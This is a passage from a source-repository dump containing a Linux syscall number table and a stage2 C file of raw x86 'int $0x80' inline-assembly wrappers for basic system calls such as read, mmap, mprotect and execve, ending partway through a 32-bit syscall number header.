| __SC_COMP(__NR_sched_rr_get_interval, sys_sched_rr_get_interval, \ 388 | compat_sys_sched_rr_get_interval) 389 | 390 | /* kernel/signal.c */ 391 | #define __NR_restart_syscall 128 392 | __SYSCALL(__NR_restart_syscall, sys_restart_syscall) 393 | #define __NR_kill 129 394 | __SYSCALL(__NR_kill, sys_kill) 395 | #define __NR_tkill 130 396 | __SYSCALL(__NR_tkill, sys_tkill) 397 | #define __NR_tgkill 131 398 | __SYSCALL(__NR_tgkill, sys_tgkill) 399 | #define __NR_sigaltstack 132 400 | __SC_COMP(__NR_sigaltstack, sys_sigaltstack, compat_sys_sigaltstack) 401 | #define __NR_rt_sigsuspend 133 402 | __SC_COMP(__NR_rt_sigsuspend, sys_rt_sigsuspend, compat_sys_rt_sigsuspend) 403 | #define __NR_rt_sigaction 134 404 | __SC_COMP(__NR_rt_sigaction, sys_rt_sigaction, compat_sys_rt_sigaction) 405 | #define __NR_rt_sigprocmask 135 406 | __SC_COMP(__NR_rt_sigprocmask, sys_rt_sigprocmask, compat_sys_rt_sigprocmask) 407 | #define __NR_rt_sigpending 136 408 | __SC_COMP(__NR_rt_sigpending, sys_rt_sigpending, compat_sys_rt_sigpending) 409 | #define __NR_rt_sigtimedwait 137 410 | __SC_COMP(__NR_rt_sigtimedwait, sys_rt_sigtimedwait, \ 411 | compat_sys_rt_sigtimedwait) 412 | #define __NR_rt_sigqueueinfo 138 413 | __SC_COMP(__NR_rt_sigqueueinfo, sys_rt_sigqueueinfo, \ 414 | compat_sys_rt_sigqueueinfo) 415 | #define __NR_rt_sigreturn 139 416 | __SC_COMP(__NR_rt_sigreturn, sys_rt_sigreturn, compat_sys_rt_sigreturn) 417 | 418 | /* kernel/sys.c */ 419 | #define __NR_setpriority 140 420 | __SYSCALL(__NR_setpriority, sys_setpriority) 421 | #define __NR_getpriority 141 422 | __SYSCALL(__NR_getpriority, sys_getpriority) 423 | #define __NR_reboot 142 424 | __SYSCALL(__NR_reboot, sys_reboot) 425 | #define __NR_setregid 143 426 | __SYSCALL(__NR_setregid, sys_setregid) 427 | #define __NR_setgid 144 428 | __SYSCALL(__NR_setgid, sys_setgid) 429 | #define __NR_setreuid 145 430 | __SYSCALL(__NR_setreuid, sys_setreuid) 431 | #define __NR_setuid 146 432 | __SYSCALL(__NR_setuid, sys_setuid) 433 | #define __NR_setresuid 147 434 | __SYSCALL(__NR_setresuid, sys_setresuid) 435 | #define __NR_getresuid 148 436 | __SYSCALL(__NR_getresuid, sys_getresuid) 437 | #define __NR_setresgid 149 438 | __SYSCALL(__NR_setresgid, sys_setresgid) 439 | #define __NR_getresgid 150 440 | __SYSCALL(__NR_getresgid, sys_getresgid) 441 | #define __NR_setfsuid 151 442 | __SYSCALL(__NR_setfsuid, sys_setfsuid) 443 | #define __NR_setfsgid 152 444 | __SYSCALL(__NR_setfsgid, sys_setfsgid) 445 | #define __NR_times 153 446 | __SC_COMP(__NR_times, sys_times, compat_sys_times) 447 | #define __NR_setpgid 154 448 | __SYSCALL(__NR_setpgid, sys_setpgid) 449 | #define __NR_getpgid 155 450 | __SYSCALL(__NR_getpgid, sys_getpgid) 451 | #define __NR_getsid 156 452 | __SYSCALL(__NR_getsid, sys_getsid) 453 | #define __NR_setsid 157 454 | __SYSCALL(__NR_setsid, sys_setsid) 455 | #define __NR_getgroups 158 456 | __SYSCALL(__NR_getgroups, sys_getgroups) 457 | #define __NR_setgroups 159 458 | __SYSCALL(__NR_setgroups, sys_setgroups) 459 | #define __NR_uname 160 460 | __SYSCALL(__NR_uname, sys_newuname) 461 | #define __NR_sethostname 161 462 | __SYSCALL(__NR_sethostname, sys_sethostname) 463 | #define __NR_setdomainname 162 464 | __SYSCALL(__NR_setdomainname, sys_setdomainname) 465 | #define __NR_getrlimit 163 466 | __SC_COMP(__NR_getrlimit, sys_getrlimit, compat_sys_getrlimit) 467 | #define __NR_setrlimit 164 468 | __SC_COMP(__NR_setrlimit, sys_setrlimit, compat_sys_setrlimit) 469 | #define __NR_getrusage 165 470 | __SC_COMP(__NR_getrusage, sys_getrusage, compat_sys_getrusage) 471 | #define __NR_umask 166 472 | __SYSCALL(__NR_umask, sys_umask) 473 | #define __NR_prctl 167 474 | __SYSCALL(__NR_prctl, sys_prctl) 475 | #define __NR_getcpu 168 476 | __SYSCALL(__NR_getcpu, sys_getcpu) 477 | 478 | /* kernel/time.c */ 479 | #define __NR_gettimeofday 169 480 | __SC_COMP(__NR_gettimeofday, sys_gettimeofday, compat_sys_gettimeofday) 481 | #define __NR_settimeofday 170 482 | __SC_COMP(__NR_settimeofday, sys_settimeofday, compat_sys_settimeofday) 483 | #define __NR_adjtimex 171 484 | __SC_COMP(__NR_adjtimex, sys_adjtimex, compat_sys_adjtimex) 485 | 486 | /* kernel/timer.c */ 487 | #define __NR_getpid 172 488 | __SYSCALL(__NR_getpid, sys_getpid) 489 | #define __NR_getppid 173 490 | __SYSCALL(__NR_getppid, sys_getppid) 491 | #define __NR_getuid 174 492 | __SYSCALL(__NR_getuid, sys_getuid) 493 | #define __NR_geteuid 175 494 | __SYSCALL(__NR_geteuid, sys_geteuid) 495 | #define __NR_getgid 176 496 | __SYSCALL(__NR_getgid, sys_getgid) 497 | #define __NR_getegid 177 498 | __SYSCALL(__NR_getegid, sys_getegid) 499 | #define __NR_gettid 178 500 | __SYSCALL(__NR_gettid, sys_gettid) 501 | #define __NR_sysinfo 179 502 | __SC_COMP(__NR_sysinfo, sys_sysinfo, compat_sys_sysinfo) 503 | 504 | /* ipc/mqueue.c */ 505 | #define __NR_mq_open 180 506 | __SC_COMP(__NR_mq_open, sys_mq_open, compat_sys_mq_open) 507 | #define __NR_mq_unlink 181 508 | __SYSCALL(__NR_mq_unlink, sys_mq_unlink) 509 | #define __NR_mq_timedsend 182 510 | __SC_COMP(__NR_mq_timedsend, sys_mq_timedsend, compat_sys_mq_timedsend) 511 | #define __NR_mq_timedreceive 183 512 | __SC_COMP(__NR_mq_timedreceive, sys_mq_timedreceive, \ 513 | compat_sys_mq_timedreceive) 514 | #define __NR_mq_notify 184 515 | __SC_COMP(__NR_mq_notify, sys_mq_notify, compat_sys_mq_notify) 516 | #define __NR_mq_getsetattr 185 517 | __SC_COMP(__NR_mq_getsetattr, sys_mq_getsetattr, compat_sys_mq_getsetattr) 518 | 519 | /* ipc/msg.c */ 520 | #define __NR_msgget 186 521 | __SYSCALL(__NR_msgget, sys_msgget) 522 | #define __NR_msgctl 187 523 | __SC_COMP(__NR_msgctl, sys_msgctl, compat_sys_msgctl) 524 | #define __NR_msgrcv 188 525 | __SC_COMP(__NR_msgrcv, sys_msgrcv, compat_sys_msgrcv) 526 | #define __NR_msgsnd 189 527 | __SC_COMP(__NR_msgsnd, sys_msgsnd, compat_sys_msgsnd) 528 | 529 | /* ipc/sem.c */ 530 | #define __NR_semget 190 531 | __SYSCALL(__NR_semget, sys_semget) 532 | #define __NR_semctl 191 533 | __SC_COMP(__NR_semctl, sys_semctl, compat_sys_semctl) 534 | #define __NR_semtimedop 192 535 | __SC_COMP(__NR_semtimedop, sys_semtimedop, compat_sys_semtimedop) 536 | #define __NR_semop 193 537 | __SYSCALL(__NR_semop, sys_semop) 538 | 539 | /* ipc/shm.c */ 540 | #define __NR_shmget 194 541 | __SYSCALL(__NR_shmget, sys_shmget) 542 | #define __NR_shmctl 195 543 | __SC_COMP(__NR_shmctl, sys_shmctl, compat_sys_shmctl) 544 | #define __NR_shmat 196 545 | __SC_COMP(__NR_shmat, sys_shmat, compat_sys_shmat) 546 | #define __NR_shmdt 197 547 | __SYSCALL(__NR_shmdt, sys_shmdt) 548 | 549 | /* net/socket.c */ 550 | #define __NR_socket 198 551 | __SYSCALL(__NR_socket, sys_socket) 552 | #define __NR_socketpair 199 553 | __SYSCALL(__NR_socketpair, sys_socketpair) 554 | #define __NR_bind 200 555 | __SYSCALL(__NR_bind, sys_bind) 556 | #define __NR_listen 201 557 | __SYSCALL(__NR_listen, sys_listen) 558 | #define __NR_accept 202 559 | __SYSCALL(__NR_accept, sys_accept) 560 | #define __NR_connect 203 561 | __SYSCALL(__NR_connect, sys_connect) 562 | #define __NR_getsockname 204 563 | __SYSCALL(__NR_getsockname, sys_getsockname) 564 | #define __NR_getpeername 205 565 | __SYSCALL(__NR_getpeername, sys_getpeername) 566 | #define __NR_sendto 206 567 | __SYSCALL(__NR_sendto, sys_sendto) 568 | #define __NR_recvfrom 207 569 | __SC_COMP(__NR_recvfrom, sys_recvfrom, compat_sys_recvfrom) 570 | #define __NR_setsockopt 208 571 | __SC_COMP(__NR_setsockopt, sys_setsockopt, compat_sys_setsockopt) 572 | #define __NR_getsockopt 209 573 | __SC_COMP(__NR_getsockopt, sys_getsockopt, compat_sys_getsockopt) 574 | #define __NR_shutdown 210 575 | __SYSCALL(__NR_shutdown, sys_shutdown) 576 | #define __NR_sendmsg 211 577 | __SC_COMP(__NR_sendmsg, sys_sendmsg, compat_sys_sendmsg) 578 | #define __NR_recvmsg 212 579 | __SC_COMP(__NR_recvmsg, sys_recvmsg, compat_sys_recvmsg) 580 | 581 | /* mm/filemap.c */ 582 | #define __NR_readahead 213 583 | __SC_COMP(__NR_readahead, sys_readahead, compat_sys_readahead) 584 | 585 | /* mm/nommu.c, also with MMU */ 586 | #define __NR_brk 214 587 | __SYSCALL(__NR_brk, sys_brk) 588 | #define __NR_munmap 215 589 | __SYSCALL(__NR_munmap, sys_munmap) 590 | #define __NR_mremap 216 591 | __SYSCALL(__NR_mremap, sys_mremap) 592 | 593 | /* security/keys/keyctl.c */ 594 | #define __NR_add_key 217 595 | __SYSCALL(__NR_add_key, sys_add_key) 596 | #define __NR_request_key 218 597 | __SYSCALL(__NR_request_key, sys_request_key) 598 | #define __NR_keyctl 219 599 | __SC_COMP(__NR_keyctl, sys_keyctl, compat_sys_keyctl) 600 | 601 | /* arch/example/kernel/sys_example.c */ 602 | #define __NR_clone 220 603 | __SYSCALL(__NR_clone, sys_clone) 604 | #define __NR_execve 221 605 | __SC_COMP(__NR_execve, sys_execve, compat_sys_execve) 606 | 607 | #define __NR3264_mmap 222 608 | __SC_3264(__NR3264_mmap, sys_mmap2, sys_mmap) 609 | /* mm/fadvise.c */ 610 | #define __NR3264_fadvise64 223 611 | __SC_COMP(__NR3264_fadvise64, sys_fadvise64_64, compat_sys_fadvise64_64) 612 | 613 | /* mm/, CONFIG_MMU only */ 614 | #ifndef __ARCH_NOMMU 615 | #define __NR_swapon 224 616 | __SYSCALL(__NR_swapon, sys_swapon) 617 | #define __NR_swapoff 225 618 | __SYSCALL(__NR_swapoff, sys_swapoff) 619 | #define __NR_mprotect 226 620 | __SYSCALL(__NR_mprotect, sys_mprotect) 621 | #define __NR_msync 227 622 | __SYSCALL(__NR_msync, sys_msync) 623 | #define __NR_mlock 228 624 | __SYSCALL(__NR_mlock, sys_mlock) 625 | #define __NR_munlock 229 626 | __SYSCALL(__NR_munlock, sys_munlock) 627 | #define __NR_mlockall 230 628 | __SYSCALL(__NR_mlockall, sys_mlockall) 629 | #define __NR_munlockall 231 630 | __SYSCALL(__NR_munlockall, sys_munlockall) 631 | #define __NR_mincore 232 632 | __SYSCALL(__NR_mincore, sys_mincore) 633 | #define __NR_madvise 233 634 | __SYSCALL(__NR_madvise, sys_madvise) 635 | #define __NR_remap_file_pages 234 636 | __SYSCALL(__NR_remap_file_pages, sys_remap_file_pages) 637 | #define __NR_mbind 235 638 | __SC_COMP(__NR_mbind, sys_mbind, compat_sys_mbind) 639 | #define __NR_get_mempolicy 236 640 | __SC_COMP(__NR_get_mempolicy, sys_get_mempolicy, compat_sys_get_mempolicy) 641 | #define __NR_set_mempolicy 237 642 | __SC_COMP(__NR_set_mempolicy, sys_set_mempolicy, compat_sys_set_mempolicy) 643 | #define __NR_migrate_pages 238 644 | __SC_COMP(__NR_migrate_pages, sys_migrate_pages, compat_sys_migrate_pages) 645 | #define __NR_move_pages 239 646 | __SC_COMP(__NR_move_pages, sys_move_pages, compat_sys_move_pages) 647 | #endif 648 | 649 | #define __NR_rt_tgsigqueueinfo 240 650 | __SC_COMP(__NR_rt_tgsigqueueinfo, sys_rt_tgsigqueueinfo, \ 651 | compat_sys_rt_tgsigqueueinfo) 652 | #define __NR_perf_event_open 241 653 | __SYSCALL(__NR_perf_event_open, sys_perf_event_open) 654 | #define __NR_accept4 242 655 | __SYSCALL(__NR_accept4, sys_accept4) 656 | #define __NR_recvmmsg 243 657 | __SC_COMP(__NR_recvmmsg, sys_recvmmsg, compat_sys_recvmmsg) 658 | 659 | /* 660 | * Architectures may provide up to 16 syscalls of their own 661 | * starting with this value. 662 | */ 663 | #define __NR_arch_specific_syscall 244 664 | 665 | #define __NR_wait4 260 666 | __SC_COMP(__NR_wait4, sys_wait4, compat_sys_wait4) 667 | #define __NR_prlimit64 261 668 | __SYSCALL(__NR_prlimit64, sys_prlimit64) 669 | #define __NR_fanotify_init 262 670 | __SYSCALL(__NR_fanotify_init, sys_fanotify_init) 671 | #define __NR_fanotify_mark 263 672 | __SYSCALL(__NR_fanotify_mark, sys_fanotify_mark) 673 | #define __NR_name_to_handle_at 264 674 | __SYSCALL(__NR_name_to_handle_at, sys_name_to_handle_at) 675 | #define __NR_open_by_handle_at 265 676 | __SC_COMP(__NR_open_by_handle_at, sys_open_by_handle_at, \ 677 | compat_sys_open_by_handle_at) 678 | #define __NR_clock_adjtime 266 679 | __SC_COMP(__NR_clock_adjtime, sys_clock_adjtime, compat_sys_clock_adjtime) 680 | #define __NR_syncfs 267 681 | __SYSCALL(__NR_syncfs, sys_syncfs) 682 | #define __NR_setns 268 683 | __SYSCALL(__NR_setns, sys_setns) 684 | #define __NR_sendmmsg 269 685 | __SC_COMP(__NR_sendmmsg, sys_sendmmsg, compat_sys_sendmmsg) 686 | #define __NR_process_vm_readv 270 687 | __SC_COMP(__NR_process_vm_readv, sys_process_vm_readv, \ 688 | compat_sys_process_vm_readv) 689 | #define __NR_process_vm_writev 271 690 | __SC_COMP(__NR_process_vm_writev, sys_process_vm_writev, \ 691 | compat_sys_process_vm_writev) 692 | #define __NR_kcmp 272 693 | __SYSCALL(__NR_kcmp, sys_kcmp) 694 | #define __NR_finit_module 273 695 | __SYSCALL(__NR_finit_module, sys_finit_module) 696 | #define __NR_sched_setattr 274 697 | __SYSCALL(__NR_sched_setattr, sys_sched_setattr) 698 | #define __NR_sched_getattr 275 699 | __SYSCALL(__NR_sched_getattr, sys_sched_getattr) 700 | #define __NR_renameat2 276 701 | __SYSCALL(__NR_renameat2, sys_renameat2) 702 | __SYSCALL(277, sys_ni_syscall) 703 | __SYSCALL(278, sys_ni_syscall) 704 | #define __NR_memfd_create 279 705 | __SYSCALL(__NR_memfd_create, sys_memfd_create) 706 | 707 | #undef __NR_syscalls 708 | #define __NR_syscalls 280 709 | 710 | /* 711 | * All syscalls below here should go away really, 712 | * these are provided for both review and as a porting 713 | * help for the C library version. 714 | * 715 | * Last chance: are any of these important enough to 716 | * enable by default? 717 | */ 718 | #define __ARCH_WANT_SYSCALL_NO_AT 719 | 720 | #ifdef __ARCH_WANT_SYSCALL_NO_AT 721 | #define __NR_open 1024 722 | __SYSCALL(__NR_open, sys_open) 723 | #define __NR_link 1025 724 | __SYSCALL(__NR_link, sys_link) 725 | #define __NR_unlink 1026 726 | __SYSCALL(__NR_unlink, sys_unlink) 727 | #define __NR_mknod 1027 728 | __SYSCALL(__NR_mknod, sys_mknod) 729 | #define __NR_chmod 1028 730 | __SYSCALL(__NR_chmod, sys_chmod) 731 | #define __NR_chown 1029 732 | __SYSCALL(__NR_chown, sys_chown) 733 | #define __NR_mkdir 1030 734 | __SYSCALL(__NR_mkdir, sys_mkdir) 735 | #define __NR_rmdir 1031 736 | __SYSCALL(__NR_rmdir, sys_rmdir) 737 | #define __NR_lchown 1032 738 | __SYSCALL(__NR_lchown, sys_lchown) 739 | #define __NR_access 1033 740 | __SYSCALL(__NR_access, sys_access) 741 | #define __NR_rename 1034 742 | __SYSCALL(__NR_rename, sys_rename) 743 | #define __NR_readlink 1035 744 | __SYSCALL(__NR_readlink, sys_readlink) 745 | #define __NR_symlink 1036 746 | __SYSCALL(__NR_symlink, sys_symlink) 747 | #define __NR_utimes 1037 748 | __SYSCALL(__NR_utimes, sys_utimes) 749 | #define __NR3264_stat 1038 750 | __SC_3264(__NR3264_stat, sys_stat64, sys_newstat) 751 | #define __NR3264_lstat 1039 752 | __SC_3264(__NR3264_lstat, sys_lstat64, sys_newlstat) 753 | 754 | #undef __NR_syscalls 755 | #define __NR_syscalls (__NR3264_lstat+1) 756 | #endif /* __ARCH_WANT_SYSCALL_NO_AT */ 757 | 758 | #ifdef __ARCH_WANT_SYSCALL_NO_FLAGS 759 | #define __NR_pipe 1040 760 | __SYSCALL(__NR_pipe, sys_pipe) 761 | #define __NR_dup2 1041 762 | __SYSCALL(__NR_dup2, sys_dup2) 763 | #define __NR_epoll_create 1042 764 | __SYSCALL(__NR_epoll_create, sys_epoll_create) 765 | #define __NR_inotify_init 1043 766 | __SYSCALL(__NR_inotify_init, sys_inotify_init) 767 | #define __NR_eventfd 1044 768 | __SYSCALL(__NR_eventfd, sys_eventfd) 769 | #define __NR_signalfd 1045 770 | __SYSCALL(__NR_signalfd, sys_signalfd) 771 | 772 | #undef __NR_syscalls 773 | #define __NR_syscalls (__NR_signalfd+1) 774 | #endif /* __ARCH_WANT_SYSCALL_NO_FLAGS */ 775 | 776 | #if (__BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT)) && \ 777 | defined(__ARCH_WANT_SYSCALL_OFF_T) 778 | #define __NR_sendfile 1046 779 | __SYSCALL(__NR_sendfile, sys_sendfile) 780 | #define __NR_ftruncate 1047 781 | __SYSCALL(__NR_ftruncate, sys_ftruncate) 782 | #define __NR_truncate 1048 783 | __SYSCALL(__NR_truncate, sys_truncate) 784 | #define __NR_stat 1049 785 | __SYSCALL(__NR_stat, sys_newstat) 786 | #define __NR_lstat 1050 787 | __SYSCALL(__NR_lstat, sys_newlstat) 788 | #define __NR_fstat 1051 789 | __SYSCALL(__NR_fstat, sys_newfstat) 790 | #define __NR_fcntl 1052 791 | __SYSCALL(__NR_fcntl, sys_fcntl) 792 | #define __NR_fadvise64 1053 793 | #define __ARCH_WANT_SYS_FADVISE64 794 | __SYSCALL(__NR_fadvise64, sys_fadvise64) 795 | #define __NR_newfstatat 1054 796 | #define __ARCH_WANT_SYS_NEWFSTATAT 797 | __SYSCALL(__NR_newfstatat, sys_newfstatat) 798 | #define __NR_fstatfs 1055 799 | __SYSCALL(__NR_fstatfs, sys_fstatfs) 800 | #define __NR_statfs 1056 801 | __SYSCALL(__NR_statfs, sys_statfs) 802 | #define __NR_lseek 1057 803 | __SYSCALL(__NR_lseek, sys_lseek) 804 | #define __NR_mmap 1058 805 | __SYSCALL(__NR_mmap, sys_mmap) 806 | 807 | #undef __NR_syscalls 808 | #define __NR_syscalls (__NR_mmap+1) 809 | #endif /* 32 bit off_t syscalls */ 810 | 811 | #ifdef __ARCH_WANT_SYSCALL_DEPRECATED 812 | #define __NR_alarm 1059 813 | #define __ARCH_WANT_SYS_ALARM 814 | __SYSCALL(__NR_alarm, sys_alarm) 815 | #define __NR_getpgrp 1060 816 | #define __ARCH_WANT_SYS_GETPGRP 817 | __SYSCALL(__NR_getpgrp, sys_getpgrp) 818 | #define __NR_pause 1061 819 | #define __ARCH_WANT_SYS_PAUSE 820 | __SYSCALL(__NR_pause, sys_pause) 821 | #define __NR_time 1062 822 | #define __ARCH_WANT_SYS_TIME 823 | #define __ARCH_WANT_COMPAT_SYS_TIME 824 | __SYSCALL(__NR_time, sys_time) 825 | #define __NR_utime 1063 826 | #define __ARCH_WANT_SYS_UTIME 827 | __SYSCALL(__NR_utime, sys_utime) 828 | 829 | #define __NR_creat 1064 830 | __SYSCALL(__NR_creat, sys_creat) 831 | #define __NR_getdents 1065 832 | #define __ARCH_WANT_SYS_GETDENTS 833 | __SYSCALL(__NR_getdents, sys_getdents) 834 | #define __NR_futimesat 1066 835 | __SYSCALL(__NR_futimesat, sys_futimesat) 836 | #define __NR_select 1067 837 | #define __ARCH_WANT_SYS_SELECT 838 | __SYSCALL(__NR_select, sys_select) 839 | #define __NR_poll 1068 840 | __SYSCALL(__NR_poll, sys_poll) 841 | #define __NR_epoll_wait 1069 842 | __SYSCALL(__NR_epoll_wait, sys_epoll_wait) 843 | #define __NR_ustat 1070 844 | __SYSCALL(__NR_ustat, sys_ustat) 845 | #define __NR_vfork 1071 846 | __SYSCALL(__NR_vfork, sys_vfork) 847 | #define __NR_oldwait4 1072 848 | __SYSCALL(__NR_oldwait4, sys_wait4) 849 | #define __NR_recv 1073 850 | __SYSCALL(__NR_recv, sys_recv) 851 | #define __NR_send 1074 852 | __SYSCALL(__NR_send, sys_send) 853 | #define __NR_bdflush 1075 854 | __SYSCALL(__NR_bdflush, sys_bdflush) 855 | #define __NR_umount 1076 856 | __SYSCALL(__NR_umount, sys_oldumount) 857 | #define __ARCH_WANT_SYS_OLDUMOUNT 858 | #define __NR_uselib 1077 859 | __SYSCALL(__NR_uselib, sys_uselib) 860 | #define __NR__sysctl 1078 861 | __SYSCALL(__NR__sysctl, sys_sysctl) 862 | 863 | #define __NR_fork 1079 864 | #ifdef CONFIG_MMU 865 | __SYSCALL(__NR_fork, sys_fork) 866 | #else 867 | __SYSCALL(__NR_fork, sys_ni_syscall) 868 | #endif /* CONFIG_MMU */ 869 | 870 | #undef __NR_syscalls 871 | #define __NR_syscalls (__NR_fork+1) 872 | 873 | #endif /* __ARCH_WANT_SYSCALL_DEPRECATED */ 874 | 875 | /* 876 | * 32 bit systems traditionally used different 877 | * syscalls for off_t and loff_t arguments, while 878 | * 64 bit systems only need the off_t version. 879 | * For new 32 bit platforms, there is no need to 880 | * implement the old 32 bit off_t syscalls, so 881 | * they take different names. 882 | * Here we map the numbers so that both versions 883 | * use the same syscall table layout. 884 | */ 885 | #if __BITS_PER_LONG == 64 && !defined(__SYSCALL_COMPAT) 886 | #define __NR_fcntl __NR3264_fcntl 887 | #define __NR_statfs __NR3264_statfs 888 | #define __NR_fstatfs __NR3264_fstatfs 889 | #define __NR_truncate __NR3264_truncate 890 | #define __NR_ftruncate __NR3264_ftruncate 891 | #define __NR_lseek __NR3264_lseek 892 | #define __NR_sendfile __NR3264_sendfile 893 | #define __NR_newfstatat __NR3264_fstatat 894 | #define __NR_fstat __NR3264_fstat 895 | #define __NR_mmap __NR3264_mmap 896 | #define __NR_fadvise64 __NR3264_fadvise64 897 | #ifdef __NR3264_stat 898 | #define __NR_stat __NR3264_stat 899 | #define __NR_lstat __NR3264_lstat 900 | #endif 901 | #else 902 | #define __NR_fcntl64 __NR3264_fcntl 903 | #define __NR_statfs64 __NR3264_statfs 904 | #define __NR_fstatfs64 __NR3264_fstatfs 905 | #define __NR_truncate64 __NR3264_truncate 906 | #define __NR_ftruncate64 __NR3264_ftruncate 907 | #define __NR_llseek __NR3264_lseek 908 | #define __NR_sendfile64 __NR3264_sendfile 909 | #define __NR_fstatat64 __NR3264_fstatat 910 | #define __NR_fstat64 __NR3264_fstat 911 | #define __NR_mmap2 __NR3264_mmap 912 | #define __NR_fadvise64_64 __NR3264_fadvise64 913 | #ifdef __NR3264_stat 914 | #define __NR_stat64 __NR3264_stat 915 | #define __NR_lstat64 __NR3264_lstat 916 | #endif 917 | #endif 918 | -------------------------------------------------------------------------------- /stage2/syscall_x86.c: -------------------------------------------------------------------------------- 1 | #include "syscall_x86.h" 2 | #include "linuxdefs.h" 3 | 4 | ssize_t _read(int fd, void *buf, size_t size) 5 | { 6 | ssize_t ret; 7 | asm volatile 8 | ( 9 | "int $0x80" 10 | : "=a" (ret) 11 | : "0"(__NR_read), "bx"(fd), "c"(buf), "d"(size) 12 | ); 13 | return ret; 14 | } 15 | 16 | ssize_t _write(int fd, const void *buf, size_t size) 17 | { 18 | ssize_t ret; 19 | asm volatile 20 | ( 21 | "int $0x80" 22 | : "=a" (ret) 23 | : "0"(__NR_write), "bx"(fd), "c"(buf), "d"(size) 24 | ); 25 | return ret; 26 | } 27 | 28 | int _open(char *path, int mode, int flags) 29 | { 30 | long ret; 31 | 32 | asm volatile 33 | ( 34 | "int $0x80" 35 | : "=a" (ret) 36 | : "0"(__NR_open), "bx"(path), "c"(mode), "d"(flags) 37 | ); 38 | return ret; 39 | } 40 | 41 | int _close(int fd) 42 | { 43 | long ret; 44 | 45 | asm volatile 46 | ( 47 | "int $0x80" 48 | : "=a" (ret) 49 | : "0"(__NR_close), "bx"(fd) 50 | ); 51 | return ret; 52 | } 53 | 54 | long _lseek(int fd, long offset, int whence) 55 | { 56 | long ret; 57 | 58 | asm volatile 59 | ( 60 | "int $0x80" 61 | : "=a" (ret) 62 | : "0"(__NR_lseek), "bx"(fd), "c"(offset), "d"(whence) 63 | ); 64 | return ret; 65 | } 66 | 67 | void * _mmap(void * start, long length, int prot, int flags, int fd, long offset) 68 | { 69 | register long rebp asm("ebp") = offset; 70 | void * ret; 71 | 72 | asm volatile 73 | ( 74 | "int $0x80" 75 | : "=a" (ret) 76 | : "0"(__NR_mmap), "b"(&start) 77 | ); 78 | return ret; 79 | } 80 | 81 | long _mprotect(void * addr, long len, int prot) 82 | { 83 | long ret; 84 | 85 | asm volatile 86 | ( 87 | "int $0x80" 88 | : "=a" (ret) 89 | : "0"(__NR_mprotect), "bx"(addr), "c"(len), "d"(prot) 90 | ); 91 | return ret; 92 | } 93 | 94 | long _munmap(char * start, int length) 95 | { 96 | long ret; 97 | 98 | asm volatile 99 | ( 100 | "int $0x80" 101 | : "=a" (ret) 102 | : "0"(__NR_munmap), "bx"(start), "c"(length) 103 | ); 104 | return ret; 105 | } 106 | 107 | long _brk(unsigned long addr) 108 | { 109 | long ret; 110 | 111 | asm volatile 112 | ( 113 | "int $0x80" 114 | : "=a" (ret) 115 | : "0"(__NR_brk), "bx"(addr) 116 | ); 117 | 118 | return ret; 119 | } 120 | 121 | long _exit(int level) 122 | { 123 | long ret; 124 | 125 | asm volatile 126 | ( 127 | "int $0x80" 128 | : "=a" (ret) 129 | : "0"(__NR_exit), "bx"(level) 130 | ); 131 | return (ret); 132 | } 133 | 134 | long _execve(char * filename, char ** argv, char ** envp) 135 | { 136 | long ret; 137 | 138 | asm volatile 139 | ( 140 | "int $0x80" 141 | : "=a" (ret) 142 | : "0"(__NR_execve), "bx"(filename), "c"(argv), "d"(envp) 143 | ); 144 | return ret; 145 | } 146 | -------------------------------------------------------------------------------- /stage2/syscall_x86.h: -------------------------------------------------------------------------------- 1 | #ifndef _ASM_X86_UNISTD_32_H 2 | #define _ASM_X86_UNISTD_32_H 1 3 | 4 | #define __NR_restart_syscall 0 5 | #define __NR_exit 1 6 | #define __NR_fork 2 7 | #define __NR_read 3 8 | #define __NR_write 4 9 | #define __NR_open 5 10 | #define __NR_close 6 11 | #define __NR_waitpid 7 12 | #define __NR_creat 8 13 | #define __NR_link 9 14 | #define __NR_unlink 10 15 | #define __NR_execve 11 16 | #define __NR_chdir 12 17 | #define __NR_time 13 18 | #define __NR_mknod 14 19 | #define __NR_chmod 15 20 | #define __NR_lchown 16 21 | #define __NR_break 17 22 | #define __NR_oldstat 18 23 | #define __NR_lseek 19 24 | #define __NR_getpid 20 25 | #define __NR_mount 21 26 | #define __NR_umount 22 27 | #define __NR_setuid 23 28 | #define __NR_getuid 24 29 | #define __NR_stime 25 30 | #define __NR_ptrace 26 31 | #define __NR_alarm 27 32 | #define __NR_oldfstat 28 33 | #define __NR_pause 29 34 | #define __NR_utime 30 35 | #define __NR_stty 31 36 | #define __NR_gtty 32 37 | #define __NR_access 33 38 | #define __NR_nice 34 39 | #define __NR_ftime 35 40 | #define __NR_sync 36 41 | #define __NR_kill 37 42 | #define __NR_rename 38 43 | #define __NR_mkdir 39 44 | #define __NR_rmdir 40 45 | #define __NR_dup 41 46 | #define __NR_pipe 42 47 | #define __NR_times 43 48 | #define __NR_prof 44 49 | #define __NR_brk 45 50 | #define __NR_setgid 46 51 | #define __NR_getgid 47 52 | #define __NR_signal 48 53 | #define __NR_geteuid 49 54 | #define __NR_getegid 50 55 | #define __NR_acct 51 56 | #define __NR_umount2 52 57 | #define __NR_lock 53 58 | #define __NR_ioctl 54 59 | #define __NR_fcntl 55 60 | #define __NR_mpx 56 61 | #define __NR_setpgid 57 62 | #define __NR_ulimit 58 63 | #define __NR_oldolduname 59 64 | #define __NR_umask 60 65 | #define __NR_chroot 61 66 | #define __NR_ustat 62 67 | #define __NR_dup2 63 68 | #define __NR_getppid 64 69 | #define __NR_getpgrp 65 70 | #define __NR_setsid 66 71 | #define __NR_sigaction 67 72 | #define __NR_sgetmask 68 73 | #define __NR_ssetmask 69 74 | #define __NR_setreuid 70 75 | #define __NR_setregid 71 76 | #define __NR_sigsuspend 72 77 | #define __NR_sigpending 73 78 | #define __NR_sethostname 74 79 | #define __NR_setrlimit 75 80 | #define __NR_getrlimit 76 81 | #define __NR_getrusage 77 82 | #define __NR_gettimeofday 78 83 | #define __NR_settimeofday 79 84 | #define __NR_getgroups 80 85 | #define __NR_setgroups 81 86 | #define __NR_select 82 87 | #define __NR_symlink 83 88 | #define __NR_oldlstat 84 89 | #define __NR_readlink 85 90 | #define __NR_uselib 86 91 | #define __NR_swapon 87 92 | #define __NR_reboot 88 93 | #define __NR_readdir 89 94 | #define __NR_mmap 90 95 | #define __NR_munmap 91 96 | #define __NR_truncate 92 97 | #define __NR_ftruncate 93 98 | #define __NR_fchmod 94 99 | #define __NR_fchown 95 100 | #define __NR_getpriority 96 101 | #define __NR_setpriority 97 102 | #define __NR_profil 98 103 | #define __NR_statfs 99 104 | #define __NR_fstatfs 100 105 | #define 